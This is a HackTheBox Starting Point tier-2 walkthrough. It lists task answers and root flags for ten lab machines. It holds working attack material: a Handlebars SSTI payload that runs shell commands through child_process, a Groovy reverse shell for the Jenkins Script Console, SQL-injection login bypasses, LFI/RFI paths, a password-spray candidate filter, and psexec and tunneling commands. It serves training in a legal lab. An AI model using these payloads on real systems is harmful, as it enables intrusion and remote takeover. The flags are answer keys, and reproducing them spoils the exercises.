HackTheBox-starting-point-02

Learning outcomes

In the second tier you dig deeper into web application penetration testing, focusing on beginner-friendly web exploitation techniques. You learn the basics of SQL injection, server-side template injection and remote file inclusion, and how to use web shells and reverse shells effectively. Building on the first tier, you apply these techniques against the services shown earlier and gain hands-on understanding of their vulnerabilities.

You also learn how to navigate Jenkins, a popular automation server, log in and upload a Groovy shell script, a valuable penetration-testing skill. Finally, you round out your expertise by learning how to upload files to an S3 bucket, giving you a broad skill set for standing out in cyber security. This tier takes you one step further on your pentesting journey.

  • Learn how to connect anonymously to FTP, SMB, Telnet, Rsync and RDP.
  • Learn how to use Nmap to identify open ports.
  • Learn how to connect to a MongoDB server.
  • Learn how to upload files to an S3 bucket.

Machine: Appointment

TASK 1

What does the acronym SQL stand for?

Structured Query Language

TASK 2

What is one of the most common types of SQL vulnerabilities?

SQL injection

TASK 3

What is the 2021 OWASP Top 10 classification for this vulnerability?

A03:2021-Injection

TASK 4

What does Nmap report as the service and version that are running on port 80 of the target?

Apache httpd 2.4.38 ((Debian))

TASK 5

What is the standard port used for the HTTPS protocol?

443

TASK 6

What is a folder called in web-application terminology?

directory

TASK 7

What HTTP response code is given for 'Not Found' errors?

404

TASK 8

Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?

dir

TASK 9

What single character can be used to comment out the rest of a line in MySQL?

#

TASK 10

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

Congratulations

SUBMIT FLAG

Submit root flag

e3d0796d002a446c0e622226f42e9672
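Added example (not from the original page or the HTB lab): a Python/sqlite3 model of the login query that Tasks 9 and 10 attack. The users table, the column names and the stored password are constructed for this demo. SQLite only accepts the "-- " line comment where MySQL also accepts "#", but the mechanism is identical: the injected quote closes the string literal and the comment discards the rest of the WHERE clause, so the password is never compared. The parameterised query shows the fix.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed demo database: one admin row. Table and column names are
    # assumptions for this example, not the lab's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret-not-guessable!')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # String concatenation: the user input becomes part of the SQL grammar.
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the input is bound as data and never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    conn = make_db()
    # Comment injection: the quote ends the literal, the comment swallows
    # "' AND password = '...'" so only the username is checked.
    # MySQL accepts "admin'#" or "admin'-- " here; SQLite only "-- ".
    payload = "admin'-- "
    results = {
        "vuln_wrong_password": login_vulnerable(conn, "admin", "wrong"),
        "vuln_comment_bypass": login_vulnerable(conn, payload, "anything"),
        "vuln_or_true": login_vulnerable(conn, "x' OR 1=1-- ", "anything"),
        "safe_comment_bypass": login_safe(conn, payload, "anything"),
        "safe_real_password": login_safe(conn, "admin", "S3cret-not-guessable!"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

demo() shows the vulnerable login accepting admin'-- with any password while the parameterised version rejects it; against the lab's MariaDB the same bypass is admin'# (or admin'-- , with the trailing space MySQL requires after --).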

Machine: Sequel

TASK 1

During our scan, which port do we find serving MySQL?

3306

TASK 2

What community-developed MySQL version is the target running?

MariaDB

TASK 3

When using the MySQL command line client, what switch do we need to use in order to specify a login username?

-u

TASK 4

Which username allows us to log into this MariaDB instance without providing a password?

root

TASK 5

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

*

TASK 6

In SQL, what symbol do we need to end each query with?

;

TASK 7

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?

htb

SUBMIT FLAG

Submit root flag

7b4bec00d1a39e3dd4e021ec3d915da8

Machine: Crocodile

TASK 1

What Nmap scanning switch employs the use of default scripts during a scan?

-sC

TASK 2

What service version is found to be running on port 21?

vsftpd 3.0.3

TASK 3

What FTP code is returned to us for the "Anonymous FTP login allowed" message?

230

TASK 4

After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

anonymous

TASK 5

After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?

get

TASK 6

What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?

admin

TASK 7

What version of Apache HTTP Server is running on the target host?

Apache httpd 2.4.41

TASK 8

What switch can we use with Gobuster to specify we are looking for specific filetypes?

-x

TASK 9

Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

login.php

SUBMIT FLAG

Submit root flag

c7110277ac44d78b6a9fff2232434d16

Machine: Responder

TASK 1

When visiting the web service using the IP address, what is the domain that we are being redirected to?

unika.htb

TASK 2

Which scripting language is being used on the server to generate webpages?

php

TASK 3

What is the name of the URL parameter which is used to load different language versions of the webpage?

page

TASK 4

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

../../../../../../../../windows/system32/drivers/etc/hosts

TASK 5

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

//10.10.14.6/somefile

TASK 6

What does NTLM stand for?

New Technology LAN Manager

TASK 7

Which flag do we use in the Responder utility to specify the network interface?

-I

TASK 8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

John The Ripper

TASK 9

What is the password for the administrator user?

badminton

TASK 10

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?

5985

SUBMIT FLAG

Submit root flag

ea81b7afddd03efaa0945333ed147fac

Machine: Three

TASK 1

How many TCP ports are open?

2

TASK 2

What is the domain of the email address provided in the "Contact" section of the website?

thetoppers.htb

TASK 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

/etc/hosts

TASK 4

Which sub-domain is discovered during further enumeration?

s3.thetoppers.htb

TASK 5

Which service is running on the discovered sub-domain?

Amazon S3

TASK 6

Which command line utility can be used to interact with the service running on the discovered sub-domain?

awscli

TASK 7

Which command is used to set up the AWS CLI installation?

aws configure

TASK 8

What is the command used by the above utility to list all of the S3 buckets?

aws s3 ls

TASK 9

This server is configured to run files written in what web scripting language?

php

SUBMIT FLAG

Submit root flag

a980d99281a28d638ac68b9bf9453c2b

Machine: Ignition

TASK 1

Which service version is found to be running on port 80?

nginx 1.14.2

TASK 2

What is the 3-digit HTTP status code returned when you visit http://{machine IP}/?

302

TASK 3

What is the virtual host name the webpage expects to be accessed by?

ignition.htb

TASK 4

What is the full path to the file on a Linux computer that holds a local list of domain name to IP address pairs?

/etc/hosts

TASK 5

Use a tool to brute force directories on the webserver. What is the full URL to the Magento login page?

http://ignition.htb/admin

TASK 6

Look up the password requirements for Magento and also try searching for the most common passwords of 2023. Which password provides access to the admin account?

qwerty123

SUBMIT FLAG

Submit root flag

797d6c988d9dc5865e010b9410f247e0
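Added example (not from the original page) for Task 6: before trying a "most common passwords" list against the Magento admin login, drop every entry the application would have refused at password-set time. Magento 2's default admin policy demands at least 7 characters containing both letters and digits, which eliminates most of the top of such lists. The word list below is a constructed excerpt modelled on published 2023 lists, not the full published list.

```python
import re

# Magento 2 default admin password policy: minimum 7 characters, and the
# password must contain both alphabetic and numeric characters.
MIN_LENGTH = 7


def meets_magento_policy(password: str) -> bool:
    return (
        len(password) >= MIN_LENGTH
        and re.search(r"[A-Za-z]", password) is not None
        and re.search(r"[0-9]", password) is not None
    )


def filter_wordlist(words) -> list:
    """Keep only candidates Magento would have accepted, preserving list order
    (order matters: the list is ranked by frequency, so try the top survivors first)."""
    return [w for w in words if meets_magento_policy(w)]


# Constructed excerpt in the style of a "most common passwords of 2023" ranking.
COMMON_2023 = [
    "123456", "admin", "12345678", "123456789", "1234", "12345", "password",
    "123", "Aa123456", "1234567890", "UNKNOWN", "1234567", "123123", "111111",
    "Password", "12345678910", "000000", "admin123", "qwerty123", "Admin@123",
]


def candidates() -> list:
    return filter_wordlist(COMMON_2023)


if __name__ == "__main__":
    print(f"{len(COMMON_2023)} entries, {len(candidates())} satisfy the policy:")
    for pw in candidates():
        print(" ", pw)
```

Twenty entries shrink to four, and qwerty123 is among them; the same filter is worth applying before any password spray, since guesses the target policy forbids only cost attempts and lockout budget.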

Machine: Bike

TASK 1

What TCP ports does nmap identify as open? Answer with a list of ports separated by commas with no spaces, from low to high.

22,80

TASK 2

What software is running the service listening on the http/web port identified in the first question?

Node.js

TASK 3

What is the name of the Web Framework according to Wappalyzer?

Express

TASK 4

What is the name of the vulnerability we test for by submitting {{7*7}}?

Server Side Template Injection

TASK 5

What is the templating engine being used within Node.JS?

Handlebars

TASK 6

What is the name of the BurpSuite tab used to encode text?

Decoder

TASK 7

In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?

URL

TASK 8

When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?

require

TASK 9

What variable is the name of the top-level scope in Node.JS?

global

TASK 10

By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?

root

SUBMIT FLAG

Submit root flag

6b258d726d287462d60c103d0142a81c

Handlebars SSTI payload (the HackTricks payload with the command replaced; URL-encode it before putting it in the request body). The {{!-- --}} lines are Handlebars comments and are ignored when the template is rendered.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{!-- push String.prototype.sub's constructor, i.e. the Function constructor --}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{!-- body of the function to build; require is not defined in the sandbox (Task 8), so reach it via process.mainModule --}}
        {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{!-- Function.apply(0, [code]) builds the function; rendering {{this}} invokes it --}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

Machine: Funnel

TASK 1

How many TCP ports are open?

2

TASK 2

What is the name of the directory that is available on the FTP server?

mail_backup

TASK 3

What is the default account password that every new member on the "Funnel" team should change as soon as possible?

funnel123#!#

TASK 4

Which user has not changed their default password yet?

christine

TASK 5

Which service is running on TCP port 5432 and listens only on localhost?

postgresql

TASK 6

Since you can't access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?

local port forwarding

TASK 7

What is the name of the database that holds the flag?

secrets

TASK 8

Could you use a dynamic tunnel instead of local port forwarding? Yes or No.

Yes

SUBMIT FLAG

Submit root flag

cf277664b1771217d7006acdea006db1

Local port forwarding

# ssh -L local_port:destination_host:destination_port user@remote_host
ssh -L 1111:127.0.0.1:5432 christine@10.129.228.195
# connect locally: port 1111 on the attacker machine is relayed to 127.0.0.1:5432 on the target
psql -U christine -h 127.0.0.1 -p 1111

Dynamic port forwarding (SOCKS proxy; this is the dynamic tunnel Task 8 asks about, not remote port forwarding)

# ssh -D local_port user@remote_host
ssh -D 1111 christine@10.129.16.51

Set up the SSH SOCKS proxy: ssh -D 1111 christine@10.129.16.51

Configure /etc/proxychains4.conf so that proxychains sends traffic through the SOCKS proxy on 127.0.0.1:1111

Connect to the PostgreSQL database with psql through proxychains

Machine: Pennyworth

TASK 1

What does the acronym CVE stand for?

Common Vulnerabilities and Exposures

TASK 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

Confidentiality, Integrity, Availability

TASK 3

What is the version of the service running on port 8080?

Jetty 9.4.39.v20210325

TASK 4

What version of Jenkins is running on the target?

2.289.1

TASK 5

What type of script is accepted as input on the Jenkins Script Console?

Groovy

TASK 6

What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

cmd.exe

TASK 7

What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

ifconfig

TASK 8

What switch should we use with netcat for it to use UDP transport mode?

-u

TASK 9

What is the term used to describe making a target host initiate a connection back to the attacker host?

reverse shell

SUBMIT FLAG

Submit root flag

9cdfb439c7876e703e307864c9167a15

Jenkins RCE script (Groovy reverse shell, pasted into the Script Console; start a listener on the attacker host on port 8000 first)

String host = "{your_IP}";   // attacker IP
int port = 8000;             // listener port
String cmd = "/bin/bash";    // "cmd.exe" if the target runs Windows (Task 6)
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// relay loop: shell output -> socket, socket input -> shell stdin, until either side ends
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();   // throws while the shell is still running
        break;
    } catch (Exception e) {}
}
p.destroy();
s.close();

Machine: Tactics

TASK 1

Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?

-Pn

TASK 2

What does the 3-letter acronym SMB stand for?

Server Message Block

TASK 3

What port does SMB use to operate at?

445

TASK 4

What command line argument do you give to smbclient to list available shares?

-L

TASK 5

What character at the end of a share name indicates it's an administrative share?

$

TASK 6

Which Administrative share is accessible on the box that allows users to view the whole file system?

C$

TASK 7

What command can we use to download the files we find on the SMB Share?

get

TASK 8

Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?

psexec.py

SUBMIT FLAG

Submit root flag

f751c19eda8f61ce81827e6930a1f40c

impacket-psexec

python psexec.py username:password@hostIP

smbclient

smbclient //ip/C$ -U administrator
